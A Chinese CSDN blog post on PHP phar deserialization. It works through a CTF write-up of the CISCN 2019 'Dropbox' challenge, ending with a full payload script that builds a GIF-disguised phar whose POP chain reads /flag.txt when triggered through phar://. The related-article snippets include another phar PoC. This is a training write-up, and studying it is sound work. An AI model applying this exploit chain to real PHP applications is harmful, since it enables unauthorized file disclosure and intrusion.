Phar与反序列化

已于 2022-07-09 17:27:40 修改
阅读量149 收藏
点赞数
文章标签: php 开发语言
于 2022-07-09 17:24:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57304829/article/details/125696392
版权

phar相关安全知识总结 - 简书 (jianshu.com)

利用 phar 拓展 php 反序列化漏洞攻击面

phar功能

压缩文件,将内容序列化存储

生成phar代码:

#注意:要将php.ini中的phar.readonly选项设置为Off,并删除前面的;,否则无法生成phar文件。
<?php
    class User{
        public $name='khaz';
        function __destruct(){
            echo "destruct";
        }
    }
    $phar = new Phar("test.phar");//生成的压缩文件名为test.phar
    $phar->startBuffering();
    //设置stub
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    //将自定义的meta-data存入manifest
    $a = new User();
    $phar->setMetadata($a);
    //添加要压缩的文件
    $phar->addFromString("test.txt", "test");
    //签名自动计算
    $phar->stopBuffering();
?>

用010打开生成的test.phar

在这里插入图片描述

关注stub和manifest

stub:phar识别标志,只要有了这个识别标志,即使后缀名不为phar,php仍能够将文件识别为phar文件
manifest:这一部分是我们可控的地方,是反序列化漏洞的关键点

存在的漏洞

  1. phar中manifest是用户自定义的

  2. php一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化.

    <?php
    class User{
        public $name;
        function __destruct(){
            echo "destruct";
        }
    }
    $a="phar://test.phar";
    file_get_contents($a);
?>

​ 受到影响的函数

img

利用条件

  1. phar文件要能够上传到服务器端。

  2. 要有可用的魔术方法作为“跳板”。

  3. 文件操作函数的参数可控,且:/phar等特殊字符没有被过滤。

buu复现–[CISCN2019 华北赛区 Day1 Web1]Dropbox

打开是登录页面,要么目标就是登录上去,要么就是登录后的功能有问题。

先找注册界面,有注册界面,那应该就是登陆后的功能有问题。

有一个文件上传,下载,删除功能。经测试,文件下载部分存在任意文件下载漏洞,通过此漏洞得到源码。

代码审计:

因为buu上有phar标签,所以知道考的是phar。

反着找,先找文件函数

class.php下
return file_get_contents($this->filename);

File::close调用了file_get_contents($this->filename)触发phar反序列化
所以要构造filename=flag所在路径

再看哪里调用了close方法:

  1. download.php

    21,17:     echo $file->close();
但是这里限制了目录访问并过滤了flag,所以不能利用
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false)

  2. class.php

User::destruct
57,20:         $this->db->close();
所以猜测要让$db为File对象

正着找

  1. index.php

    $a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
首先实例化了FileList类,然后调用了这个类中的Name和Size方法,但是FileList类中没有这两个方法,那么就会调用
__call魔术方法

  2. 查找FileList类是否有call方法

    Filelist::callpublic function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
__call方法的参数$func是被调用的不存在的方法名
关注$file->$func(),调用了$func()

  3. $file是什么:往前看

    foreach ($filenames as $filename) {
    		//知道$file是File对象
            $file = new File();
            $file->open($path . $filename);
    		//知道files存放path下的所有文件对象($filenames = scandir($path);)
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
 }

  4. 回看call方法

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            //results[文件名][方法名]=File::$func的结果
            $this->results[$file->name()][$func] = $file->$func();
        }
}

    所以Filelist::call就是当Filelist对象调用的方法不在Filelist类时,将该方法用File类重载,并把执行结果保存到Filelist.results中。
    所以如果Filelist对象调用了close方法,就相当于调用了File.close()。
    所以$db应该为Filelist对象,这样就可以调用File.close()

  5. 继续向下看

    public function __destruct()中关注
foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
将方法结果保存到value即table中
最后echo $table;就相当于echo file_get_contents($filename);

  6. 到这里思路就清晰了。

我们让User类中的$db为Filelist对象,当$db销毁时触发User::destruct()方法,就会调用close方法,但是Filelist::close不存在,就会触发Filelist::call,从而调用File::close,执行file_get_contents($filename),最后将结果返回输出。

payload

<?php
    class User {
    	public $db;
    }
    class File {
    	public $filename;
    }
    class FileList {
        private $files;
        private $results;
        private $funcs;
        public function __construct() {
            $this->files = array();
            $this->results = array();
            $this->funcs = array();
            
            $file = new File();
            $file->filename = '/flag.txt';	# 这里的flag.txt是多次猜测出来的
            array_push($this->files, $file);
    	}
    }

	#让User类中的$db为Filelist对象
    $user = new User();
	$filelist = new FileList();
	$user->db = $filelist;

    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");  //设置stub,增加gif文件头
    $phar->setMetadata($user); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

最后将生成的phar.phar上传(直接修改文件后缀名后上传或者抓包修改content-type)为phar.gif,然后使用phar协议访问文件,有两个地方可以访问,download.php和delete.php,前面分析过dowmload.php对目录和文件名作了限制,所以使用delete.php来进行访问。
在这里插入图片描述

m0_57304829
关注
mysql 反序列化函数_phar反序列化
weixin_42529544的博客
01-21 1028
phar反序列化前段时间纵横杯遇到一题反序列化,当时队友做出来了,赛后尝试复现一下,并总结反序列化内容phar的本质是一种压缩文件,会以序列化的形式存储用户自定义的meta-dataPhar文件结构stub:phar文件标识,以 __HALT_COMPILER();?>结尾manifest:压缩文件的属性等信息,以序列化的形式存储自定义的meta-datacontents:压缩文件的内容si...
PHP phar反序列化
weixin_55190422的博客
09-23 645
以题为例 进来后我们注册一个账户并登录 查看一下网页源代码发,并没有发现什么我们上传个文件看看能不能通过菜刀获取权限 发现并不能连接上。此时我们通过BP抓包看看能不能获取到有用的信息 发现一个filename裸露在我们视野我们考虑让filename=xxx.php获取到index.php 我们这样尝试发现没用这是为啥呢?这里有个细节我们一般上传文件都是在网站主目录下的,所以这里需要跳转到上级目录所以我们需要让filename=../../index.php 出现了index.
Phar反序列化
st0ut的博客
11-07 560
前言 通过做题发现了Phar反序列化这个漏洞点,发现自己以前遇到过,但是都是模模糊糊的过去了。这次就好好总结一下。 Phar 反序列化 Phar文件结构 在php>=5.3的时候,默认开启支持Phar,文件状态问为只读,而且使用phar文件不需要任何配置。php使用phar://伪协议来解析phar文件的内容。 在php<5.3得时候,要将php.ini中的 phar.readonly...
phar反序列化
qq_63928796的博客
08-08 522
在软件中,PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发。
php归档格式:phar文件详解(创建、使用、解包还原提取)
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
php伪协议漏洞_浅析phar反序列化漏洞攻击及实战
weixin_39785150的博客
12-10 645
浅析phar反序列漏洞攻击及实战前言phar反序列化漏洞很久之前就开始接触了;因为当时出了点问题导致一直无法成功,所以当时直接去学习其他的漏洞了;今天觉得是时候把这个漏洞补上去了;漏洞成因phar文件会以序列化的形式存储用户自定义的meta-data;该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unse...
某某大学某学院后台Phar反序列化GetShell
末初的CSDN博客
07-30 1313
某某大学某学院一次后台Phar反序列化GetShell
记一道CTF中的phar反序列化
qq_53886354的博客
08-14 2443
通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。....
thinkphp5.1.37 可以读写文件 利用phar反序列化
weixin_45805993的博客
11-29 981
安洵杯一道题…一开始根本没想到用phar…还是太菜了 tp版本5.1.37TLS 源码 <?php namespace app\index\controller; use think\Controller; class Index extends controller { public function index() { return '<style type="text/css">*{ padding: 0; margin: 0; } div{ pad
利用PHAR协议进行PHP反序列化攻击1
08-03
PHP反序列化攻击利用PHAR协议详解】 PHP反序列化攻击是一种常见的安全漏洞利用方式,其中PHARPhp ARchive)协议是这类攻击的一个关键路径。PHARPHP中用于打包和分发代码的机制,类似于Java的JAR文件。在...
phar反序列化的简单总结
m0_62422842的博客
04-22 723
前言 一般我们在做题时,看到代码中有serialize函数或者unserialize函数,我们肯定会想到php反序列化,那如果代码中没有这两个函数,它0是不是也能进行反序列化? 来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式—phar反序列化。不用serialize函数就能进行序列化操作,这其实就跟phar://伪协议和phar 文件的打包机制有关。 什么是phar 它就是一种php程序的一种打包文件,类似与java中的jar文件,无需解压,直接通过phar://伪协
深入浅出带你了解PHAR反序列化
Galaxy_0的博客
02-12 503
深入浅出带你了解PHAR反序列化
phar文件上传的骚姿势(绕过phar、_HALT)
qq_62046696的博客
10-07 1960
前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。知道今天看到了一篇好的文章。
关于php----phar伪协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2135
关于php----phar伪协议和phar文件反序列化漏洞利用pharphp archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
phar反序列化小结
Lethe's Blog
11-13 3119
0x00 phar反序列化 phar反序列化即在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。 关于其他反序列化的总结,可以看我的这篇文章 0x01 原理 首先了解一下phar文件的结构,一个phar文件由四部分构成: a stub:可以理解为一个标志,格式为xxx<...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6843
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
PHPphar文件详解_phar文件格式_调用phar类方法生成phar文件
Ho1aAs‘s Blog
09-04 8278
phar简介 phar,全称为PHP Archive,phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法,以方便移动、安装。.phar文件的最大特点是将几个文件组合成一个文件的便捷方式,.phar文件提供了一种将完整的PHP程序分布在一个文件中并从该文件中运行的方法。 可以将phar文件类比为一个压缩文件 phar demo 注意:默认phar扩展是只读模式,需要手动配置php.ini中phar.readonly= Off 无法用ini_set修改 『踩坑记录』PHP-使用ini_set
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
phar反序列化poc
最新发布
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值